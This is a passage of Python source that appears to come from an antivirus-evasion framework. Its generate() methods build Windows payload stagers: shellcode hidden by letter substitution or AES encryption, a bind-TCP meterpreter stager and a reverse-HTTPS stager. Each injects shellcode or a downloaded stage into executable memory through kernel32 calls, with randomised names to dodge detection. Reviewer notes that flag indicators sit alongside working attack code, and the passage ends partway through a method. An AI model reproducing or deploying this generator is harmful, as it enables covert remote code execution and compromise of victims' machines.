    payload_code += '\t' * num_tabs_required + "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, socketName)
    payload_code += '\t' * num_tabs_required + "\t\t" + rcvCStringName + " = " + randctypes + ".create_string_buffer(%s, len(%s))\n" % (rcvStringName,rcvStringName)
    # prepend a little assembly magic to push the socket fd into the edi register
    payload_code += '\t' * num_tabs_required + "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName)
    # copy the socket fd in
    payload_code += '\t' * num_tabs_required + "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName)
    payload_code += '\t' * num_tabs_required + "\t\treturn %s\n" % (rcvCStringName)
    # NOTE(review): bare except in the emitted script — every failure becomes a silent None
    payload_code += '\t' * num_tabs_required + "\texcept: return None\n"
    # build the method that injects the .dll into memory
    payload_code += '\t' * num_tabs_required + "def %s(%s):\n" %(injectMethodName,tempShellcodeName)
    payload_code += '\t' * num_tabs_required + "\tif %s != None:\n" %(tempShellcodeName)
    payload_code += '\t' * num_tabs_required + "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName)
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        # NOTE(review): this branch prefixes lines with a bare "\t\t" while the heap branch
        # below uses '\t' * num_tabs_required + "\t\t" — the two branches disagree on indentation
        # allocate enough virtual memory to stuff the .dll in (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE)
        payload_code += "\t\t" + fpName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + shellcodeBufName + "))," + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n"
        # expose the bytearray as a ctypes c_char array (from_buffer); no lock call is made despite
        # the original "virtual lock" comment
        payload_code += "\t\t" + tempCBuffer + " = (" + randctypes + ".c_char * len(" + shellcodeBufName + ")).from_buffer(" + shellcodeBufName + ")\n"
        # copy the .dll into the allocated memory
        payload_code += "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + fpName + "), " + tempCBuffer + ", " + randctypes + ".c_int(len(" + shellcodeBufName + ")))\n"
        # kick the thread off to execute the .dll
        payload_code += "\t\tht = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + fpName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n"
        # wait for the .dll execution to finish
        payload_code += "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(ht)," + randctypes + ".c_int(-1))\n"
    # Assume HEAP Injection
    else:
        HeapVar = evasion_helpers.randomString()
        handleName = evasion_helpers.randomString()
        # Emitted chain: HeapCreate(HEAP_CREATE_ENABLE_EXECUTE=0x00040000) -> HeapAlloc(HEAP_ZERO_MEMORY=0x00000008)
        # -> RtlMoveMemory -> CreateThread -> WaitForSingleObject(INFINITE)
        payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + shellcodeBufName + ') * 2),' + randctypes + '.c_int(0))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + fpName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + shellcodeBufName + ')))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + tempCBuffer + ' = (' + randctypes + '.c_char * len(' + shellcodeBufName + ')).from_buffer(' + shellcodeBufName + ')\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + fpName + '),' + tempCBuffer + ',' + randctypes + '.c_int(len(' + shellcodeBufName + ')))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + fpName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n'
    # download the stager
    payload_code += '\t' * num_tabs_required + "%s = %s()\n" %(shellCodeName, getDataMethodName)
    # inject what we grabbed
    payload_code += '\t' * num_tabs_required + "%s(%s)\n" % (injectMethodName, shellCodeName)
    # Optional post-processing of the generated source (pyherion's behaviour is not visible here)
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)
    self.payload_source_code = payload_code
    return
def generate(self):
    """Build the Python source of a letter-substituted self-injecting payload.

    The shellcode's escaped text form has one hex letter
    (``encode_with_this``, drawn from ``self.hex_letters``) swapped for a
    non-hex letter (``decode_with_this``, from ``self.non_hex_letters``)
    before being embedded.  The emitted script reverses the swap with
    ``bytes.translate`` and ``codecs.escape_decode`` and then runs the
    result in-process through ``ctypes.windll.kernel32`` using the
    "virtual" or "heap" chain chosen by
    ``required_options["INJECT_METHOD"]``.  Result goes to
    ``self.payload_source_code``; returns ``None``.

    NOTE(review): ``ShellcodeVariableName`` is assigned but never used —
    the emitted script only refers to ``subbed_shellcode_variable_name``.
    The substitution letters are emitted as literals alongside the data,
    so, like the other wrappers here, this is obfuscation only.
    """
    # Random letter substitution variables
    encode_with_this = random.choice(self.hex_letters)
    decode_with_this = random.choice(self.non_hex_letters)
    # Generate Random Variable Names
    subbed_shellcode_variable_name = evasion_helpers.randomString()
    ShellcodeVariableName = evasion_helpers.randomString()
    rand_decoded_letter = evasion_helpers.randomString()
    rand_correct_letter = evasion_helpers.randomString()
    rand_sub_scheme = evasion_helpers.randomString()
    randctypes = evasion_helpers.randomString()
    rand_ptr = evasion_helpers.randomString()
    rand_ht = evasion_helpers.randomString()
    rand_virtual_protect = evasion_helpers.randomString()
    # Generate the shellcode
    if not self.cli_shellcode:
        Shellcode = self.shellcode.generate(self.cli_opts)
        # Record which kind of shellcode was produced
        if self.shellcode.msfvenompayload:
            self.payload_type = self.shellcode.msfvenompayload
        elif self.shellcode.payload_choice:
            self.payload_type = self.shellcode.payload_choice
            self.shellcode.payload_choice = ""
        # assume custom shellcode
        else:
            self.payload_type = 'custom'
    else:
        Shellcode = self.cli_shellcode
    # Work on the escaped text form; swap the chosen letter, then double every backslash
    # NOTE(review): the doubling is undone by the only consumer below (.replace('\\\\', '\\')),
    # so the round trip appears to have no net effect
    Shellcode = Shellcode.encode('unicode_escape')
    Shellcode = Shellcode.decode('ascii')
    Shellcode = Shellcode.replace(encode_with_this, decode_with_this).replace('\\', '\\\\')
    # gamemaker supplies the preamble and the indentation depth the rest must use
    payload_code, num_tabs_required = gamemaker.senecas_games(self)
    # Add in the letter switching code
    payload_code += '\t' * num_tabs_required + 'import codecs\n'
    payload_code += '\t' * num_tabs_required + rand_decoded_letter + ' = b\'%s\'\n' % decode_with_this
    payload_code += '\t' * num_tabs_required + rand_correct_letter + ' = b\'%s\'\n' % encode_with_this
    payload_code += '\t' * num_tabs_required + rand_sub_scheme + ' = bytes.maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
    payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = b\'' + Shellcode.replace( '\\\\', '\\') + '\'\n'
    payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
    payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ', _ = codecs.escape_decode(' + subbed_shellcode_variable_name + ')\n'
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
        # Emitted chain: VirtualAlloc(0x3000, PAGE_READWRITE=0x04) -> RtlMoveMemory
        # -> VirtualProtect(PAGE_EXECUTE_READ=0x20) -> CreateThread -> WaitForSingleObject(INFINITE)
        payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n'
        payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
        payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        HeapVar = evasion_helpers.randomString()
        # Create Payload File
        payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
        # Emitted chain: HeapCreate(HEAP_CREATE_ENABLE_EXECUTE=0x00040000) -> HeapAlloc(HEAP_ZERO_MEMORY=0x00000008)
        # -> RtlMoveMemory -> CreateThread -> WaitForSingleObject(INFINITE); no VirtualProtect step
        payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ') * 2),' + randctypes + '.c_int(0))\n'
        payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + subbed_shellcode_variable_name + ')))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n'
        payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
    # Optional post-processing of the generated source (pyherion's behaviour is not visible here)
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)
    self.payload_source_code = payload_code
    return
def generate(self) -> None:
    """Build the source of a Python stub that AES-CBC-decrypts embedded shellcode and runs it in-process.

    Reads ``self.cli_shellcode`` / ``self.shellcode`` / ``self.cli_opts`` and the
    ``INJECT_METHOD`` and ``USE_PYHERION`` entries of ``self.required_options``.
    Writes ``self.payload_type`` and ``self.payload_source_code``; returns None.

    Analyst notes (what the emitted artifact contains):
      * the AES key and IV are interpolated into the stub as string literals
        right next to the base64 ciphertext, so the shellcode is recoverable
        from the artifact statically, without executing it;
      * the stub needs ``Crypto.Cipher`` (PyCrypto) on the host at run time;
      * memory is committed read/write (0x3000 / 0x04), filled with
        RtlMoveMemory, flipped to execute via VirtualProtect(0x20) and run with
        CreateThread + WaitForSingleObject(-1) — in the heap variant an
        executable heap (HeapCreate 0x00040000) is used instead;
      * if INJECT_METHOD is neither "virtual" nor "heap" no injection code is
        emitted at all — only the prefix from gamemaker.senecas_games().
    """
    # Generate the variable names
    randctypes = evasion_helpers.randomString()
    ShellcodeVariableName = evasion_helpers.randomString()
    rand_ptr = evasion_helpers.randomString()
    rand_ht = evasion_helpers.randomString()
    RandEncShellCodePayload = evasion_helpers.randomString()
    RandCipherObject = evasion_helpers.randomString()
    rand_virtual_protect = evasion_helpers.randomString()

    # Generate the shellcode: either from the configured shellcode module, or
    # from the raw string passed on the command line.
    if not self.cli_shellcode:
        Shellcode = self.shellcode.generate(self.cli_opts)
        if self.shellcode.msfvenompayload:
            self.payload_type = self.shellcode.msfvenompayload
        elif self.shellcode.payload_choice:
            self.payload_type = self.shellcode.payload_choice
            self.shellcode.payload_choice = ""
        # assume custom shellcode
        else:
            self.payload_type = 'custom'
    else:
        Shellcode = self.cli_shellcode
        # CLI shellcode arrives as an escaped text string ("\x..."); round-trip
        # through latin-1 / unicode_escape turns it into the literal bytes.
        Shellcode = Shellcode.encode('latin-1')
        Shellcode = Shellcode.decode('unicode_escape')

    # senecas_games() supplies the (optional) sandbox-check prefix and tells us
    # how deeply the rest of the stub must be indented under it.
    payload_code, num_tabs_required = gamemaker.senecas_games(self)

    # encrypt the shellcode and get our randomized key
    # NOTE(review): key and IV are returned by the helper and then embedded
    # verbatim in the generated source below.
    encoded_ciphertext, encryption_key, iv_value = encryption.aes_encryption(Shellcode)
    encoded_ciphertext = encoded_ciphertext.decode('ascii')

    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        # Create Payload code
        payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
        payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n'
        payload_code += '\t' * num_tabs_required + 'import base64\n'
        payload_code += '\t' * num_tabs_required + RandCipherObject + ' = AES.new(\'' + encryption_key + '\', AES.MODE_CBC, \'' + iv_value + '\')\n'
        payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n'
        payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + RandEncShellCodePayload + ')\n'
        # VirtualAlloc(MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE) -> copy -> VirtualProtect(PAGE_EXECUTE_READ) -> CreateThread
        payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
        payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
        payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        HeapVar = evasion_helpers.randomString()
        # Create Payload code
        payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
        payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n'
        payload_code += '\t' * num_tabs_required + 'import base64\n'
        payload_code += '\t' * num_tabs_required + RandCipherObject + ' = AES.new(\'' + encryption_key + '\', AES.MODE_CBC, \'' + iv_value + '\')\n'
        payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n'
        payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + RandEncShellCodePayload + ')\n'
        # HeapCreate(HEAP_CREATE_ENABLE_EXECUTE) sized at twice the shellcode, HeapAlloc(HEAP_ZERO_MEMORY), copy, run
        payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
        payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
        payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'

    # Optional second layer: wrap the whole stub with the pyherion crypter.
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)

    self.payload_source_code = payload_code
    return
def generate(self) -> None:
    """Build the source of a Python bind-TCP meterpreter stager.

    Reads the ``RHOST``, ``LPORT`` and ``USE_PYHERION`` entries of
    ``self.required_options``; writes ``self.payload_source_code``; returns None.

    Analyst notes (behaviour of the emitted stager, as written below):
      * it binds and listens on RHOST:LPORT and accepts a single connection,
        then reads a 4-byte little-endian length followed by that many bytes
        (the stage), so a listening socket is the first observable;
      * any exception in the download routine is swallowed (``except: return
        None``) and the injector then does nothing, so failures are silent;
      * the stage is placed in memory committed PAGE_EXECUTE_READWRITE (0x40),
        VirtualLock'ed, and started with CreateThread; ``ctypes`` is imported
        un-aliased here, unlike the sibling generators;
      * RHOST/LPORT are interpolated straight into the source, so the handler
        address is readable from the artifact.
    """
    # randomize all of the variable names used
    shellCodeName = evasion_helpers.randomString()
    socketName = evasion_helpers.randomString()
    clientSocketName = evasion_helpers.randomString()
    getDataMethodName = evasion_helpers.randomString()
    fdBufName = evasion_helpers.randomString()
    rcvStringName = evasion_helpers.randomString()
    rcvCStringName = evasion_helpers.randomString()
    injectMethodName = evasion_helpers.randomString()
    tempShellcodeName = evasion_helpers.randomString()
    shellcodeBufName = evasion_helpers.randomString()
    fpName = evasion_helpers.randomString()
    tempCBuffer = evasion_helpers.randomString()

    payload_code = "import struct, socket, binascii, ctypes, random, time\n"
    # socket and shellcode variables that need to be kept global
    payload_code += "%s, %s = None, None\n" % (shellCodeName,socketName)

    # build the method that creates a socket, connects to the handler,
    # and downloads/patches the meterpreter .dll
    payload_code += "def %s():\n" %(getDataMethodName)
    payload_code += "\ttry:\n"
    payload_code += "\t\tglobal %s\n" %(socketName)
    payload_code += "\t\tglobal %s\n" %(clientSocketName)
    # build the listening socket (bind variant: the handler connects to us)
    payload_code += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName)
    payload_code += "\t\t%s.bind(('%s', %s))\n" %(socketName,self.required_options["RHOST"][0], str(self.required_options["LPORT"][0]))
    payload_code += "\t\t%s.listen(1)\n" % (socketName)
    payload_code += "\t\t%s,_ = %s.accept()\n" % (clientSocketName, socketName)
    # pack the underlying socket file descriptor into a c structure
    payload_code += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,clientSocketName)
    # unpack the length of the payload, received as a 4 byte array from the handler
    payload_code += "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(clientSocketName)
    # buffer starts with one placeholder byte; the loop below appends the stage
    payload_code += "\t\t" + rcvStringName + " = b\" \"\n"
    # receive ALL of the payload .dll data
    payload_code += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, clientSocketName)
    payload_code += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName,rcvStringName,rcvStringName)
    # prepend a little assembly magic to push the socket fd into the edi register
    payload_code += "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName)
    # copy the socket fd in
    payload_code += "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName)
    payload_code += "\t\treturn %s\n" % (rcvCStringName)
    # bare except: every failure becomes None and the injector is skipped
    payload_code += "\texcept: return None\n"

    # build the method that injects the .dll into memory
    payload_code += "def %s(%s):\n" %(injectMethodName,tempShellcodeName)
    payload_code += "\tif %s != None:\n" %(tempShellcodeName)
    payload_code += "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName)
    # allocate enough virtual memory to stuff the .dll in (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE)
    payload_code += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(fpName,shellcodeBufName)
    # virtual lock to prevent the memory from paging out to disk
    payload_code += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" %(fpName,shellcodeBufName)
    payload_code += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(tempCBuffer,shellcodeBufName,shellcodeBufName)
    # copy the .dll into the allocated memory
    payload_code += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" %(fpName,tempCBuffer,shellcodeBufName)
    # kick the thread off to execute the .dll
    payload_code += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(fpName)
    # wait for the .dll execution to finish
    payload_code += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"

    # download the stager
    payload_code += "%s = %s()\n" %(shellCodeName, getDataMethodName)
    # inject what we grabbed
    payload_code += "%s(%s)\n" % (injectMethodName,shellCodeName)

    # Optional second layer: wrap the whole stub with the pyherion crypter.
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)

    self.payload_source_code = payload_code
    return
def generate(self) -> None:
    """Build the source of a Python reverse-HTTPS meterpreter stager.

    Reads the ``LHOST``, ``LPORT``, ``INJECT_METHOD`` and ``USE_PYHERION``
    entries of ``self.required_options``; writes ``self.payload_source_code``;
    returns None.

    Analyst notes (behaviour of the emitted stager, as written below):
      * TLS certificate validation is disabled globally
        (``ssl._create_default_https_context = ssl._create_unverified_context``)
        and an empty ProxyHandler is installed, so system proxy settings are
        bypassed;
      * the request carries the fixed User-Agent
        ``Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)`` and a 4-character
        random URI whose 8-bit ord-sum is 92 — both are stable network
        indicators for the artifact;
      * a response is only treated as a stage if Content-Length is above
        100000 bytes (a missing/unparsable header falls through to ``read()``);
      * the stage runs from PAGE_EXECUTE_READWRITE memory (virtual) or an
        executable heap (any other INJECT_METHOD value); LHOST/LPORT are
        embedded as literals;
      * ``struct`` and ``time`` are imported by the stub but do not appear to
        be used by the code emitted here.
    """
    # randomize everything, yo'
    sumMethodName = evasion_helpers.randomString()
    checkinMethodName = evasion_helpers.randomString()
    randLettersName = evasion_helpers.randomString()
    randLetterSubName = evasion_helpers.randomString()
    randBaseName = evasion_helpers.randomString()
    downloadMethodName = evasion_helpers.randomString()
    hostName = evasion_helpers.randomString()
    portName = evasion_helpers.randomString()
    requestName = evasion_helpers.randomString()
    tName = evasion_helpers.randomString()
    injectMethodName = evasion_helpers.randomString()
    dataName = evasion_helpers.randomString()
    byteArrayName = evasion_helpers.randomString()
    ptrName = evasion_helpers.randomString()
    bufName = evasion_helpers.randomString()
    handleName = evasion_helpers.randomString()
    data2Name = evasion_helpers.randomString()
    proxy_var = evasion_helpers.randomString()
    opener_var = evasion_helpers.randomString()
    randctypes = evasion_helpers.randomString()

    # How I'm tracking the number of nested tabs needed
    # to make the payload
    num_tabs_required = 0

    payload_code = "import urllib.request, string, random, struct, time, ssl, ctypes as " + randctypes + "\n"
    # senecas_games() supplies the (optional) sandbox-check prefix and the
    # indentation depth everything below must be emitted at.
    payload_code2, num_tabs_required = gamemaker.senecas_games(self)
    payload_code = payload_code + payload_code2

    # disable certificate verification for every https request in the stub
    payload_code += '\t' * num_tabs_required + "ssl._create_default_https_context = ssl._create_unverified_context\n"
    # helper method that returns the sum of all ord values in a string % 0x100
    payload_code += '\t' * num_tabs_required + "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" %(sumMethodName)

    # method that generates a new checksum value for checkin to the meterpreter handler
    # (3 random base chars + 1 more char such that the ord-sum % 0x100 == 92; up to 64 attempts)
    payload_code += '\t' * num_tabs_required + "def %s():\n" %(checkinMethodName)
    payload_code += '\t' * num_tabs_required + "\tfor x in range(64):\n"
    payload_code += '\t' * num_tabs_required + "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" %(randBaseName)
    payload_code += '\t' * num_tabs_required + "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" %(randLettersName)
    payload_code += '\t' * num_tabs_required + "\t\tfor %s in %s:\n" %(randLetterSubName, randLettersName)
    payload_code += '\t' * num_tabs_required + "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" %(sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName)

    # method that connects to a host/port over https and downloads the hosted data
    payload_code += '\t' * num_tabs_required + "def %s(%s,%s):\n" %(downloadMethodName, hostName, portName)
    # empty ProxyHandler -> no proxies, regardless of system/environment settings
    payload_code += '\t' * num_tabs_required + "\t" + proxy_var + " = urllib.request.ProxyHandler({})\n"
    payload_code += '\t' * num_tabs_required + "\t" + opener_var + " = urllib.request.build_opener(" + proxy_var + ")\n"
    payload_code += '\t' * num_tabs_required + "\turllib.request.install_opener(" + opener_var + ")\n"
    payload_code += '\t' * num_tabs_required + '\t' + requestName + " = urllib.request.Request(\"https://\" + " + hostName + " + \":\" + str(" + portName + ") + \"/\" + " + checkinMethodName + "(), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n"
    payload_code += '\t' * num_tabs_required + "\ttry:\n"
    payload_code += '\t' * num_tabs_required + "\t\t%s = urllib.request.urlopen(%s)\n" %(tName, requestName)
    payload_code += '\t' * num_tabs_required + "\t\ttry:\n"
    # only bodies larger than 100000 bytes are accepted as a stage
    payload_code += '\t' * num_tabs_required + "\t\t\tif int(%s.info()[\"Content-Length\"]) > 100000: return %s.read()\n" %(tName, tName)
    payload_code += '\t' * num_tabs_required + "\t\t\telse: return ''\n"
    # bare except: no/unparsable Content-Length -> body is read anyway
    payload_code += '\t' * num_tabs_required + "\t\texcept: return %s.read()\n" % (tName)
    payload_code += '\t' * num_tabs_required + "\texcept urllib.request.URLError: return ''\n"

    # method to inject a reflective .dll into memory
    payload_code += '\t' * num_tabs_required + "def %s(%s):\n" %(injectMethodName, dataName)
    payload_code += '\t' * num_tabs_required + "\tif %s != \"\":\n" %(dataName)
    payload_code += '\t' * num_tabs_required + "\t\t%s = bytearray(%s)\n" %(byteArrayName, dataName)

    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        # VirtualAlloc(MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) -> copy -> CreateThread -> wait
        payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + byteArrayName + ")), " + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n"
        payload_code += '\t' * num_tabs_required + "\t\t" + bufName + " = (" + randctypes + ".c_char * len(" + byteArrayName + ")).from_buffer(" + byteArrayName + ")\n"
        payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + ptrName + ")," + bufName + ", " + randctypes + ".c_int(len(" + byteArrayName + ")))\n"
